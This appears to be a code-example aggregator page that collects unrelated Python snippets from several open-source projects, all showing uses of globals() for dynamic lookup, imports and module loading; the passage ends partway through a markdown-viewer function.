Пример #1
0
 def __init__(self, rounds, player_class_names, set_size, starting_hand_size, reporter_class_names):
     self.rounds = rounds
     self.players = [globals()[class_name]("p%d" % num) for num, class_name in enumerate(player_class_names)]
     self.set_size = set_size
     self.starting_hand_size = starting_hand_size
     self.reporters = [globals()[class_name]() for class_name in reporter_class_names]
     self.aggregate_scores = dict((player, 0) for player in self.players)
Пример #2
0
    def _import_transporter(self, transporter):
        """Imports transporter module and class, returns class.
        Input value can be:
        * a full/absolute module path, like
          "MyTransporterPackage.SomeTransporterClass"
        """
        transporter_class = None
        module = None
        alternatives = []
        default_prefix = 'cloud_sync_app.transporter.transporter_'
        if not transporter.startswith(default_prefix):
            alternatives.append('%s%s' % (default_prefix, transporter))
        for module_name in alternatives:
            try:
                module = __import__(module_name, globals(), locals(), ["TRANSPORTER_CLASS"], -1)
            except ImportError:
                import traceback
                traceback.print_exc()
                pass

        if not module:
            msg = "The transporter module '%s' could not be found." % transporter
            if len(alternatives) > 1:
                msg = '%s Tried (%s)' % (msg, ', '.join(alternatives))
            self.logger.error(msg)
        else:
            try:
                classname = module.TRANSPORTER_CLASS
                module = __import__(module_name, globals(), locals(), [classname])
                transporter_class = getattr(module, classname)
            except AttributeError:
                self.logger.error("The Transporter module '%s' was found, but its Transporter class '%s' could not be found." % (module_name, classname))
        return transporter_class
Пример #3
0
def import_pyv8():
	# Importing non-existing modules is a bit tricky in Python:
	# if we simply call `import PyV8` and module doesn't exists,
	# Python will cache this failed import and will always
	# throw exception even if this module appear in PYTHONPATH.
	# To prevent this, we have to manually test if
	# PyV8.py(c) exists in PYTHONPATH before importing PyV8
	if 'PyV8' in sys.modules and 'PyV8' not in globals():
		# PyV8 was loaded by ST2, create global alias
		globals()['PyV8'] = __import__('PyV8')
		return

	loaded = False
	f, pathname, description = imp.find_module('PyV8')
	bin_f, bin_pathname, bin_description = imp.find_module('_PyV8')
	if f:
		try:
			imp.acquire_lock()
			globals()['_PyV8'] = imp.load_module('_PyV8', bin_f, bin_pathname, bin_description)
			globals()['PyV8'] = imp.load_module('PyV8', f, pathname, description)
			imp.release_lock()
			loaded = True
		finally:
			# Since we may exit via an exception, close fp explicitly.
			if f:
				f.close()
			if bin_f:
				bin_f.close()

	if not loaded:
		raise ImportError('No PyV8 module found')
Пример #4
0
    def head(self, **KWS):



        ## CHEETAH: generated from #def head at line 5, col 1.
        trans = KWS.get("trans")
        if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
            trans = self.transaction # is None unless self.awake() was called
        if not trans:
            trans = DummyTransaction()
            _dummyTrans = True
        else: _dummyTrans = False
        write = trans.response().write
        SL = self._CHEETAH__searchList
        _filter = self._CHEETAH__currentFilter
        
        ########################################
        ## START - generated method body
        
        write(u'''<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false&language=pt-br"></script>
<script type="text/javascript">
  function initialize() {
    var hotel = new google.maps.LatLng(''')
        _v = VFSL([locals()]+SL+[globals(), builtin],"site.latitude",True) # u'$site.latitude' on line 9, col 40
        if _v is not None: write(_filter(_v, rawExpr=u'$site.latitude')) # from line 9, col 40.
        write(u''', ''')
        _v = VFSL([locals()]+SL+[globals(), builtin],"site.longitude",True) # u'$site.longitude' on line 9, col 56
        if _v is not None: write(_filter(_v, rawExpr=u'$site.longitude')) # from line 9, col 56.
        write(u''');
    var myOptions = {
      zoom: 16,
      center: hotel,
      mapTypeId: google.maps.MapTypeId.ROADMAP
    };
    var map = new google.maps.Map(document.getElementById("map_canvas"), myOptions);
    var hotelMarker = new google.maps.Marker({
      position: hotel, 
      map: map, 
      title:"''')
        _v = VFSL([locals()]+SL+[globals(), builtin],"site.name",True) # u'$site.name' on line 19, col 14
        if _v is not None: write(_filter(_v, rawExpr=u'$site.name')) # from line 19, col 14.
        write(u'''"
\t});
\t
\tvar content = "S\xedtio Tur\xedstico: ''')
        _v = VFSL([locals()]+SL+[globals(), builtin],"site.name",True) # u'$site.name' on line 22, col 34
        if _v is not None: write(_filter(_v, rawExpr=u'$site.name')) # from line 22, col 34.
        write(u'''<br>"
\tvar infoWindow = new google.maps.InfoWindow({content: content});
\tinfoWindow.setPosition(hotel);
    infoWindow.open(map);
  }

</script>
''')
        
        ########################################
        ## END - generated method body
        
        return _dummyTrans and trans.response().getvalue() or ""
Пример #5
0
 def get(self, year, wwuidOrUsername):
     wwuid = None
     username = None
     if len(wwuidOrUsername.split(".")) == 1:
         wwuid = wwuidOrUsername
     else:
         username = wwuidOrUsername
     # check if we're looking at current photos or not
     if year == self.application.options.current_year:
         if wwuid:
             profile = query_by_wwuid(Profile, wwuid)
         else:
             profile = s.query(Profile).filter_by(username=str(username)).all()
     else:
         if wwuid:
             profile = archive_s.query(globals()['Archive'+str(year)]).filter_by(wwuid=str(wwuid)).all()
         else:
             profile = archive_s.query(globals()['Archive'+str(year)]).filter_by(username=str(username)).all()
     if len(profile) == 0:
         self.write({'error': 'no profile found'})
     elif len(profile) > 1:
         self.write({'error': 'too many profiles found'})
     else:
         # now we've got just one profile, return the photo field attached to a known photo URI
         profile = profile[0]
         self.redirect("https://aswwu.com/media/img-sm/"+str(profile.photo))
Пример #6
0
def update(new_info):
    """
    Update the info.

    :param new_info: Either a dict containing the new info or a path/url
                     to a json file containing the new info.
    """

    if isinstance(new_info, basestring):
        # lazy import
        import mozfile
        import json
        f = mozfile.load(new_info)
        new_info = json.loads(f.read())
        f.close()

    info.update(new_info)
    sanitize(info)
    globals().update(info)

    # convenience data for os access
    for os_name in choices['os']:
        globals()['is' + os_name.title()] = info['os'] == os_name
    # unix is special
    if isLinux or isBsd:  # noqa
        globals()['isUnix'] = True
Пример #7
0
def get_census_profile(geo_code, geo_level):
    session = get_session()

    try:
        geo_summary_levels = get_summary_geo_info(geo_code, geo_level, session)
        data = {}

        for section in PROFILE_SECTIONS:
            function_name = 'get_%s_profile' % section
            if function_name in globals():
                func = globals()[function_name]
                data[section] = func(geo_code, geo_level, session)

                # get profiles for province and/or country
                for level, code in geo_summary_levels:
                    # merge summary profile into current geo profile
                    merge_dicts(data[section], func(code, level, session), level)

        # tweaks to make the data nicer
        # show 3 largest groups on their own and group the rest as 'Other'
        group_remainder(data['service_delivery']['water_source_distribution'])
        group_remainder(data['service_delivery']['refuse_disposal_distribution'])
        group_remainder(data['service_delivery']['toilet_facilities_distribution'], 5)
        group_remainder(data['demographics']['language_distribution'], 7)
        
        return data

    finally:
        session.close()
Пример #8
0
def hnd_banl(type, source, parameters):
        if source[1] not in GROUPCHATS:
                return
        body=parameters.lower()
	nick = source[2]
	groupchat=source[1]
        if body.count(u'вернуть'):
                hnd_getold_list(type,source)
                return
        if body.count(u'копировать'):
                any_copy_banl(type,source,parameters)
                return
	afl='outcast'
	iq = xmpp.Iq('get')
	id='item'+str(random.randrange(1000, 9999))
	globals()['spk_pending'].append(id)
	iq.setTo(groupchat)
	iq.setID(id)
	globals()['spk_pending'].append(id)
	query = xmpp.Node('query')
	query.setNamespace('http://jabber.org/protocol/muc#admin')
	ban=query.addChild('item', {'affiliation':afl})
	iq.addChild(node=query)
	JCON.SendAndCallForResponse(iq, handler_banlist_answ, {'type': type, 'source': source, 'parameters': parameters})
	return
Пример #9
0
def handler_spisok_iq(type, source, parameters):
        if not parameters:
                reply(type,source,u'я могу список листов конфы глянуть,только выбери ключ!')
                return
        body=parameters.lower()
	nick = source[2]
	groupchat=source[1]
	afl=''
	if body.count(u'овнеры')>0:
                afl='owner'
        elif body.count(u'админы')>0:
                afl='admin'
        elif body.count(u'мемберы')>0:
                afl='member'
        elif body.count(u'изгои')>0:
                afl='outcast'
        if afl=='':
                return
	iq = xmpp.Iq('get')
	id='item'+str(random.randrange(1000, 9999))
	globals()['af_sh'].append(id)
	iq.setTo(groupchat)
	iq.setID(id)
	query = xmpp.Node('query')
	query.setNamespace('http://jabber.org/protocol/muc#admin')
	ban=query.addChild('item', {'affiliation':afl})
	iq.addChild(node=query)
	JCON.SendAndCallForResponse(iq, handler_sp_answ, {'type': type, 'source': source})
Пример #10
0
def main(starter, conf, version=None, just_test=False,
         server_wide_modules=None,
         gevent_script_path=None):
    """Call the `starter` script, dispatching configuration.

    All arguments are set in the standalone script produced by buildout through
    entry point options.

    :param starter: path to the main script source file (currently
      ``openerp-server``)
    :param conf: path to the Odoo configuration file (managed by the recipe)
    :param version: Odoo major version
    :param server_wide_modules: additional server wide modules, to pass with
       the ``--load`` command-line option (ignored if the option is actually
       there on the command line)
    :type version: tuple of integers
    :param just_test: if True, only run unit tests
    """
    arguments = ['-c', conf]

    if just_test:
        arguments.extend(('--log-level',
                          'test' if version >= (6, 0) else 'info',
                          '--stop-after-init'))

        if version >= (7, 0):
            arguments.append('--test-enable')

    if server_wide_modules:
        for opt in sys.argv[1:]:
            if opt.startswith('--load'):
                break
        else:
            arguments.append('--load=' + ','.join(server_wide_modules))

    if '--install-all' in sys.argv:
        sys.argv.remove('--install-all')
        from openerp.tools import config
        # Maybe we should preparse config in all cases and therefore avoid
        # adding the '-c' on the fly ?
        # Still, cautious about pre-6.1 versions
        config.parse_config(['-c', conf])
        from openerp.modules import get_modules
        arguments.extend(('-i', ','.join(get_modules())))

    insert_args(arguments)

    if version >= (8, 0):  # always true in a.r.odoo, but keeping for now
        assert gevent_script_path is not None
        patch_odoo.do_patch(gevent_script_path)

    os.chdir(os.path.split(starter)[0])
    glob = globals()
    glob['__name__'] = '__main__'
    glob['__file__'] = starter
    sys.argv[0] = starter
    try:
        execfile(starter, globals())
    except SystemExit as exc:
        return exc.code
    def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
        # Warning: some advanced Python magic is employed below to find the right functions and problems

        # Get the search function from the name and heuristic
        if fn not in dir(search):
            raise AttributeError, fn + ' is not a search function in search.py.'
        func = getattr(search, fn)
        if 'heuristic' not in func.func_code.co_varnames:
            print('[SearchAgent] using function ' + fn)
            self.searchFunction = func
        else:
            if heuristic in globals().keys():
                heur = globals()[heuristic]
            elif heuristic in dir(search):
                heur = getattr(search, heuristic)
            else:
                raise AttributeError, heuristic + ' is not a function in searchAgents.py or search.py.'
            print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
            # Note: this bit of Python trickery combines the search algorithm and the heuristic
            self.searchFunction = lambda x: func(x, heuristic=heur)

        # Get the search problem type from the name
        if prob not in globals().keys() or not prob.endswith('Problem'):
            raise AttributeError, prob + ' is not a search problem type in SearchAgents.py.'
        self.searchType = globals()[prob]
        print('[SearchAgent] using problem type ' + prob)
Пример #12
0
def _write(root, path, buf, offset, fh):
    f_path = full_path(root, path)
    vnfs_ops = VNFSOperations(root)
    file_name = vnfs_ops.vnfs_get_file_name(f_path)
    #if file_name == "action":
    if file_name in special_files and special_files[file_name]+'_write' in globals():
        try:
            nf_config = get_nf_config(vnfs_ops, f_path)
            # call the custom write function
            logger.info('Writing to ' + file_name  + ' in ' + 
                nf_config['nf_instance_name'] + '@' + nf_config['host'])
            ret_str = globals()[special_files[file_name]+'_write'](vnfs_ops._hypervisor, 
                nf_config, buf.rstrip("\n"))
        except errors.HypervisorError, ex:
            logger.debug('raised OSErro ' + str(ex.errno))
            raise OSError(ex.errno, os.strerror(ex.errno))
        logger.info('Successfully wrote ' + file_name + 
            ' in ' + nf_config['nf_instance_name'] + '@' + nf_config['host'])

        #if buf.rstrip("\n") == "activate":
        #    try:
        #        vnfs_ops.vnfs_deploy_nf(nf_path)
        #    except errors.VNFCreateError:
        #        #raise OSError(errno.EBUSY, os.strerror(errno.EBUSY))
        #        raise OSError(747, 'Cannot create VNF')
        #elif buf.rstrip("\n") == "stop":
        #    vnfs_ops.vnfs_stop_vnf(nf_path)
        #elif buf.rstrip("\n") == "start":
        #    vnfs_ops.vnfs_start_vnf(nf_path)
        #elif buf.rstrip("\n") == "destroy":
        #    vnfs_ops.vnfs_destroy_vnf(nf_path)
        os.lseek(fh, offset, os.SEEK_SET)
        os.write(fh, buf.rstrip("\n"))
        return len(buf)
Пример #13
0
def parsemodel(name):
    parsestring = """
class %(name)s(basemodel):
    _repr_expr='%(name)s'
    def __init__(self):
        self.pardata1 = open(XSPEC_MODULE_PATH+'/%(name)s.dat1', 'r').readlines()
        self.pardata2 = open(XSPEC_MODULE_PATH+'/%(name)s.dat2', 'r').readlines()
        basemodel.__init__(self)
        for lines in self.pardata1:
            self.parameters.append(parameter(lines.split()))
        for par in self.parameters:
            par.model=repr(self)
            par.group=0
        for lines in self.pardata2:
            linestr=lines.split()
            (numbkey, index, comp, modelname, parname, unit) = linestr[:6]
            self.__dict__[parname] = self.parameters[int(index)-1]
            self.__dict__[parname].name=parname
            self.__parameter_names__.append(parname)
            try:float(unit)
            except:self.__dict__[parname].unit=unit
        self.parlength=len(self.parameters)
    #def update(self):
        #for pars in [x for x in self.parameters if x.group == 0]:
            #object.__setattr__(self, pars.name, pars)
""" % {'name':name}
    exec(parsestring)
    clsobj = locals()[name]
    globals().update({name:clsobj})
Пример #14
0
def init():

    options.config = os.path.abspath( options.config )
    if options.username == 'all':
        options.username = None
    if options.email == 'all':
        options.email = None

    os.chdir( os.path.dirname( options.config ) )
    sys.path.append( 'lib' )

    from galaxy import eggs
    import pkg_resources

    import galaxy.config
    from galaxy.objectstore import build_object_store_from_config

    # lazy
    globals()['nice_size'] = __import__( 'galaxy.util', globals(), locals(), ( 'nice_size', ) ).nice_size

    config_parser = ConfigParser( dict( here = os.getcwd(),
                                        database_connection = 'sqlite:///database/universe.sqlite?isolation_level=IMMEDIATE' ) )
    config_parser.read( os.path.basename( options.config ) )

    config_dict = {}
    for key, value in config_parser.items( "app:main" ):
        config_dict[key] = value

    config = galaxy.config.Configuration( **config_dict )
    object_store = build_object_store_from_config( config )

    from galaxy.model import mapping

    return mapping.init( config.file_path, config.database_connection, create_tables = False, object_store = object_store ), object_store, config.database_connection.split(':')[0]
Пример #15
0
def readMesh(fn):
    """Read a nodes/elems model from file.

    Returns an (x,e) tuple or None
    """
    d = {}
    pf.GUI.setBusy(True)
    fil = file(fn,'r')
    for line in fil:
        if line[0] == '#':
            line = line[1:]
        globals().update(getParams(line))
        dfil = file(filename,'r')
        if mode == 'nodes':
            d['coords'] = readNodes(dfil)
        elif mode == 'elems':
            elems = d.setdefault('elems',[])
            e = readElems(dfil,int(nplex)) - int(offset)
            elems.append(e)
        elif mode == 'esets':
            d['esets'] = readEsets(dfil)
        else:
            print("Skipping unrecognized line: %s" % line)
        dfil.close()

    pf.GUI.setBusy(False)
    fil.close()
    return d                    
Пример #16
0
    def getargs(self,moduleName,className,method) :
        '''
          This will return the list of arguments in a method of python module of class.
          It accepts method list as an argument.
        '''
        print "Message : Argument list is being obtained for each method"
        methodArgsDict = {}
        if className == None:
            moduleList = moduleName.split(".")
            for index,name in enumerate(method) :
                Module = __import__(moduleList[len(moduleList) -1], globals(), locals(), [moduleList[len(moduleList) -2]], -1)
                try :
                    names = vars(Module)[name]
                except KeyError:
                    print "Message : method '" + name + "'does not exists,Continued with including it. "
                    return False
                argumentList = inspect.getargspec(names) #inspect.getargvalues(name)
                methodArgsDict[name] = argumentList[0]
        else :
            moduleList = moduleName.split(".")
            for index,name in enumerate(method) :
                Module = __import__(moduleList[len(moduleList) - 1], globals(), locals(), [className], -1)
                Class = getattr(Module, className)
                try :
                    names = vars(Class)[name]
                except KeyError :
                    print "Message : method '" + name + "'does not exists,Continued with include it."
                    return False

                argumentList = inspect.getargspec(names) #inspect.getargvalues(name)
                methodArgsDict[name] = argumentList[0]

        return methodArgsDict
Пример #17
0
  def onReload(self, moduleName="SegmentCAD"):
    #Generic reload method for any scripted module.
    #ModuleWizard will subsitute correct default moduleName.
    
    import imp, sys, os, slicer
    
    widgetName = moduleName + "Widget"

    # reload the source code
    # - set source file path
    # - load the module to the global space
    filePath = eval('slicer.modules.%s.path' % moduleName.lower())
    p = os.path.dirname(filePath)
    if not sys.path.__contains__(p):
      sys.path.insert(0,p)
    fp = open(filePath, "r")
    globals()[moduleName] = imp.load_module(
        moduleName, fp, filePath, ('.py', 'r', imp.PY_SOURCE))
    fp.close()

    # rebuild the widget
    # - find and hide the existing widget
    # - create a new widget in the existing parent
    # parent = slicer.util.findChildren(name='%s Reload' % moduleName)[0].parent()
    parent = self.parent
    for child in parent.children():
      try:
        child.hide()
      except AttributeError:
        pass
    globals()[widgetName.lower()] = eval(
        'globals()["%s"].%s(parent)' % (moduleName, widgetName))
    globals()[widgetName.lower()].setup()
Пример #18
0
def main():
    arguments = initialise()

    version_arguments = ['--major', '--minor', '--patch']
    commands = ['release', 'changelog', 'run_tests', 'bump_version', 'tag',
                'upload', 'install', 'pypi']
    suppress_version_prompt_for = ['run_tests', 'upload']

    if arguments['--new-version']:
        arguments['new_version'] = arguments['--new-version']

    module_name = config.arguments['<module_name>']

    if not probe.probe_project(module_name):
        raise Exception('Project does not meet `changes` requirements')

    for command in commands:
        if arguments[command]:
            if command not in suppress_version_prompt_for:
                arguments['new_version'] = version.get_new_version(
                    module_name,
                    version.current_version(module_name),
                    arguments.get('--noinput', False),
                    **util.extract_arguments(arguments, version_arguments)
                )
            globals()[command]()
Пример #19
0
    def getmethods(self,modulePath,Class) :
        '''
         This will get the list of methods in given module or class.
         It accepts the module path and class name. If there is no
         class name then it has be mentioned as None.
        '''
        methodList = []
        moduleList = modulePath.split("/")
        newModule = ".".join([moduleList[len(moduleList) - 2],moduleList[len(moduleList) - 1]])
        print "Message : Method list is being obatined , Please wait ..."
        try :
            if Class :
                Module = __import__(moduleList[len(moduleList) - 1], globals(), locals(), [Class], -1)
                ClassList = [x.__name__ for x in Module.__dict__.values() if inspect.isclass(x)]
                self.ClassList = ClassList
                Class = vars(Module)[Class]
                methodList = [x.__name__ for x in Class.__dict__.values() if inspect.isfunction(x)]
            else :
                Module = __import__(moduleList[len(moduleList) - 1], globals(), locals(),[moduleList[len(moduleList) - 2]], -1)
                methodList = [x.__name__ for x in Module.__dict__.values() if inspect.isfunction(x)]
                ClassList = [x.__name__ for x in Module.__dict__.values() if inspect.isclass(x)]
                self.ClassList = ClassList
        except :
            print "Error : " +str(sys.exc_info()[1])


        self.method = methodList
        return self.method
Пример #20
0
    def do_GET(self):
        parsedurl = urlparse(self.path)
        authed = type(liw.authentication.token) is not NoneType

        if parsedurl.path == '/code':
            self.json_headers()

            liw.authentication.authorization_code = params_to_d(self.path).get('code')
            self.wfile.write(dumps({'access_token': liw.authentication.get_access_token(),
                                    'routes': filter(lambda d: not d.startswith('_'), dir(liw.application))}))
        elif parsedurl.path == '/routes':
            self.json_headers()

            self.wfile.write(dumps({'routes': filter(lambda d: not d.startswith('_'), dir(liw.application))}))
        elif not authed:
            self.json_headers()

            if not globals()['run_already']:
                open_new_tab(liw.authentication.authorization_url)
            globals()['run_already'] = True
            self.wfile.write(dumps({'path': self.path, 'authed': type(liw.authentication.token) is NoneType}))
        elif authed and len(parsedurl.path) and parsedurl.path[1:] in dir(liw.application):
            self.json_headers()
            self.wfile.write(dumps(getattr(liw.application, parsedurl.path[1:])()))
        else:
            self.json_headers(501)
            self.wfile.write(dumps({'error': 'NotImplemented'}))
Пример #21
0
def main(argv=None):
    # parse the command line
    args = docopt(main_doc,
                  version='clipon version %s' % __version__,
                  options_first=True,
                  argv=argv or sys.argv[1:])
    cmd = args['<command>']
    argv = [args['<command>']] + args['<options>']

    if cmd == 'help':
        do_help(argv)
        return

    try:
        # parse the options for subcommand
        cmd_doc_name = cmd + '_doc'
        cmd_doc = globals()[cmd_doc_name]
        args = docopt(cmd_doc, argv)

        # call the subcommand handler
        method_name = 'do_' + cmd
        method = globals()[method_name]
        assert callable(method)
        method(args)
    except (KeyError, AssertionError):
        exit("%r is not a clipon command. See 'clipon help or clipon -h'." % cmd)
Пример #22
0
def check_expression(expr, var_symbols):
    """Does eval(expr) both in Sage and SymPy and does other checks."""

    # evaluate the expression in the context of Sage:
    if var_symbols:
        sage.var(var_symbols)
    a = globals().copy()
    # safety checks...
    assert not "sin" in a
    a.update(sage.__dict__)
    assert "sin" in a
    e_sage = eval(expr, a)
    assert not isinstance(e_sage, sympy.Basic)

    # evaluate the expression in the context of SymPy:
    if var_symbols:
        sympy.var(var_symbols)
    b = globals().copy()
    assert not "sin" in b
    b.update(sympy.__dict__)
    assert "sin" in b
    b.update(sympy.__dict__)
    e_sympy = eval(expr, b)
    assert isinstance(e_sympy, sympy.Basic)

    # Do the actual checks:
    assert sympy.S(e_sage) == e_sympy
    assert e_sage == sage.SR(e_sympy)
Пример #23
0
def help(player, string):
    """Display help a console command."""
    if string:
        try:
            func = globals()[string]
            if callable(func) and func.__doc__:
                for s in func.__doc__.split('\n'):
                    FantasyDemo.addChatMsg(-1, s)

            else:
                raise 'Not callable'
        except:
            FantasyDemo.addChatMsg(-1, 'No help for ' + string)

    else:
        isCallable = lambda x: callable(globals()[x])
        ignoreList = ('getV4FromString', 'help')
        notIgnored = lambda x: x not in ignoreList
        keys = filter(isCallable, globals().keys())
        keys = filter(notIgnored, keys)
        keys.sort()
        FantasyDemo.addChatMsg(-1, '/help {command} for more info.')
        stripper = lambda c: c not in '[]\'"'
        string = filter(stripper, str(keys))
        FantasyDemo.addChatMsg(-1, string)
Пример #24
0
    def _create(self, name, params):
        self._check_session(params)
        is_sr_create = name == 'SR.create'
        is_vlan_create = name == 'VLAN.create'
        # Storage Repositories have a different API
        expected = is_sr_create and 10 or is_vlan_create and 4 or 2
        self._check_arg_count(params, expected)
        (cls, _) = name.split('.')
        ref = is_sr_create and \
              _create_sr(cls, params) or \
              is_vlan_create and \
              _create_vlan(params[1], params[2], params[3]) or \
              _create_object(cls, params[1])

        # Call hook to provide any fixups needed (ex. creating backrefs)
        after_hook = 'after_%s_create' % cls
        if after_hook in globals():
            globals()[after_hook](ref, params[1])

        obj = get_record(cls, ref)

        # Add RO fields
        if cls == 'VM':
            obj['power_state'] = 'Halted'

        return ref
Пример #25
0
def exec_func(name,*args,**kwargs):
    if globals().has_key(name):
        func = globals()[name]
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            return func(options,*args,**kwargs)
    raise ValueError, name
Пример #26
0
    def test_reusable_scope(self):

        scope = let(a="tacos", b="soup", c="cake")
        d = "godzilla"

        with scope:
            self.assertEquals(a, "tacos")
            self.assertEquals(b, "soup")
            self.assertEquals(c, "cake")
            self.assertEquals(d, "godzilla")

            a = "fajita"
            b = "stew"
            d = "mothra"

        self.assertFalse("a" in locals())
        self.assertFalse("b" in locals())
        self.assertFalse("c" in locals())
        self.assertTrue("d" in locals())

        self.assertFalse("a" in globals())
        self.assertFalse("b" in globals())
        self.assertFalse("c" in globals())
        self.assertFalse("d" in globals())

        self.assertEquals(d, "mothra")

        with scope:
            self.assertEquals(a, "fajita")
            self.assertEquals(b, "stew")
            self.assertEquals(c, "cake")
            self.assertEquals(d, "mothra")
Пример #27
0
def timecheck():
    timenow = time.strftime('%M%S')
    # Fuer puenktlichere Umschaltung die Sleep-Zeit verkuerzen in der letzten Sekunde vor der vollen Stunde
    # For a better timing of the switch, have shorter sleep-time in last second before new hour
    global sleeptime
    if timenow == '5959':
        sleeptime = 0.001
    else:
        sleeptime = 0.01
    # Timer fuer die Umschaltung zur vollen Stunde
    # Timer to switch at every new hour
    if timenow == '0000':
        global now, then
        # gmtime, damit Zeitumstellung keine Rolle spielt
        # gmtime, so that daylight-saving-time won't do any harm
        now = time.strftime('%H%M%S', time.gmtime())
        if 'then' not in globals():
            then = '999999'
        if now != then:
            logging.debug("Time-Check: the time to switch is now")
            umschalt()
            then = now
    # Timer fuer den Software-Watchdog (muss jede Sekunde aufgerufen werden)
    # Timer to notify Software-Watchdog (which has to be called every second)
    global nowsecs, thensecs
    nowsecs = time.strftime('%S')
    if 'thensecs' not in globals():
        thensecs = '99'
    if nowsecs != thensecs:
        watchdogcall()
        thensecs = nowsecs
Пример #28
0
def executor(queue,task):
    """ the background process """
    logging.debug('    task started')
    stdout, sys.stdout = sys.stdout, cStringIO.StringIO()
    try:
        if task.app:
            os.chdir(os.environ['WEB2PY_PATH'])
            from gluon.shell import env
            from gluon.dal import BaseAdapter
            from gluon import current
            level = logging.getLogger().getEffectiveLevel()
            logging.getLogger().setLevel(logging.WARN)
            _env = env(task.app,import_models=True)
            logging.getLogger().setLevel(level)
            scheduler = current._scheduler
            scheduler_tasks = current._scheduler.tasks
            _function = scheduler_tasks[task.function]
            globals().update(_env)
            args = loads(task.args)
            vars = loads(task.vars, object_hook=_decode_dict)
            result = dumps(_function(*args,**vars))
        else:
            ### for testing purpose only
            result = eval(task.function)(
                *loads(task.args, object_hook=_decode_dict),
                 **loads(task.vars, object_hook=_decode_dict))
        stdout, sys.stdout = sys.stdout, stdout
        queue.put(TaskReport(COMPLETED, result,stdout.getvalue()))
    except BaseException,e:
        sys.stdout = stdout
        tb = traceback.format_exc()
        queue.put(TaskReport(FAILED,tb=tb))
Пример #29
0
    def test_nonlocal_del(self):
        # weird pythonism: the statement `del a` WITHOUT a `global a`
        # causes the compiler to create an empty fast local variable
        # named `a` with a NULL value, which it then deletes (setting
        # the value again to NULL. In other words, the del statement
        # counts as an assignment in the eyes of the compiler.

        global a, b

        a = "remove me"

        with let(a="tacos", b="soda") as my_scope:
            self.assertTrue("a" in globals())
            self.assertTrue("b" in globals())
            del a
            del b

        self.assertTrue("a" not in my_scope)
        self.assertTrue("b" not in my_scope)

        self.assertEquals(a, "remove me")
        del a

        self.assertTrue("a" not in globals())
        self.assertTrue("b" not in globals())
Пример #30
0
	def delete(self):
		result = {"status" : False}
		try:
			c_type = self.get_argument("type")
			c_id = self.get_argument("cid")
			docs = globals()[c_type.capitalize()]().query_by_cate_id(c_id)
			isdel = False
			if docs:
				result["message"] = "该分类还有文章,无法删除"
			else:
				if c_type == "common":
					sub_cate = CommonCategory().query_by_pid(c_id)
					if sub_cate:
						result["message"] = "该分类有子类,无法删除"
					else:
						isdel = True
				else:
					isdel = True
			if isdel:
				lastrowid = globals()["%sCategory"%c_type.capitalize()]().delete(c_id)
				result["status"] = True
		except Exception as e:
			print e
			result["message"] = "分类删除异常"
		self.write(json.dumps(result))
		self.finish()
Пример #31
0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import pandas as pd

from ... import opcodes as OperandDef
from ...utils import lazy_import
from ...serialize import Int32Field
from ..operands import DataFrameOperandMixin, DataFrameOperand


cudf = lazy_import('cudf', globals=globals())


class ChunkStandardizeRangeIndex(DataFrameOperand, DataFrameOperandMixin):
    _op_type_ = OperandDef.STANDARDIZE_RANGE_INDEX

    _axis = Int32Field('axis')

    def __init__(self, prepare_inputs=None, axis=None, output_types=None, **kwargs):
        super().__init__(_prepare_inputs=prepare_inputs, _axis=axis, _output_types=output_types, **kwargs)

    @property
    def axis(self):
        return self._axis

    @classmethod
Пример #32
0
def build_hl_by_token():
    if not have_pygments:
        return
    # replace code strs with tokens:
    for k, col in list(code_hl.items()):
        code_hl_tokens[getattr(token, k)] = globals()[col]
Пример #33
0
def main(md=None,
         filename=None,
         cols=None,
         theme=None,
         c_theme=None,
         bg=None,
         c_no_guess=None,
         display_links=None,
         link_style=None,
         from_txt=None,
         do_html=None,
         code_hilite=None,
         c_def_lexer=None,
         theme_info=None,
         no_colors=None,
         tab_length=4,
         no_change_defenc=False,
         **kw):
    """ md is markdown string. alternatively we use filename and read """

    if sys.version_info[0] == 2 and not no_change_defenc:
        # if I don't do this here, then I'll get probs when being
        # used as a lib:
        # https://github.com/axiros/terminal_markdown_viewer/issues/39
        # If you hate it then switch it off but don't blame me on unicode errs.
        fix_py2_default_encoding()

    tab_length = tab_length or 4
    global def_lexer
    if c_def_lexer:
        def_lexer = c_def_lexer
    py_config_file = os.path.expanduser("~/.mdv.py")
    if os.path.exists(py_config_file):
        exec_globals = {}
        exec(io.open(py_config_file, encoding='utf-8').read(), exec_globals)
        globals().update(exec_globals)

    args = locals()
    if not md:
        if not filename:
            print('Using sample markdown:')
            make_sample()
            md = args['md'] = md_sample
            print(md)
            print
            print('Styling Result')
        else:
            if filename == '-':
                md = sys.stdin.read()
            else:
                with open(filename) as f:
                    md = f.read()

    # style rolers requested?
    global term_columns
    if cols:
        term_columns = int(cols)

    if c_theme == 'all' or theme == 'all':
        if c_theme == 'all':
            os.environ['AXC_CODE_THEME'] = os.environ['MDV_CODE_THEME'] = ''
        if theme == 'all':
            os.environ['AXC_THEME'] = os.environ['MDV_THEME'] = ''
        args.pop('kw')
        themes = read_themes()
        for k, v in list(themes.items()):
            if not filename:
                yl = 'You like *%s*, *%s*?' % (k, v['name'])
                args['md'] = md_sample.replace(you_like, yl)
            print(col('%s%s%s' % ('\n\n', '=' * term_columns, '\n'), L))
            # should really create an iterator here:
            if theme == 'all':
                args['theme'] = k
            else:
                args['c_theme'] = k
            print(main(**args))
        return ''

    global show_links
    if display_links:
        show_links = 'i'
    if link_style:  # rules
        show_links = link_style

    if bg and bg == 'light':
        # not in use rite now:
        global background, color
        background = BGL
        color = T

    set_theme(theme, theme_info=theme_info)

    global guess_lexer
    guess_lexer = not c_no_guess

    if not c_theme:
        c_theme = theme or 'default'

    if c_theme == 'None':
        c_theme = None

    if c_theme:
        set_theme(c_theme, for_code=1, theme_info=theme_info)

    if c_theme:
        # info:
        if not have_pygments:
            print(col('No pygments, can not analyze code for hilite', R))

    # Create an instance of the Markdown class with the new extension
    MD = markdown.Markdown(tab_length=int(tab_length),
                           extensions=[
                               AnsiPrintExtension(),
                               TableExtension(),
                               fenced_code.FencedCodeExtension()
                           ])
    if code_hilite:
        md = do_code_hilite(md, code_hilite)
    the_html = MD.convert(md)
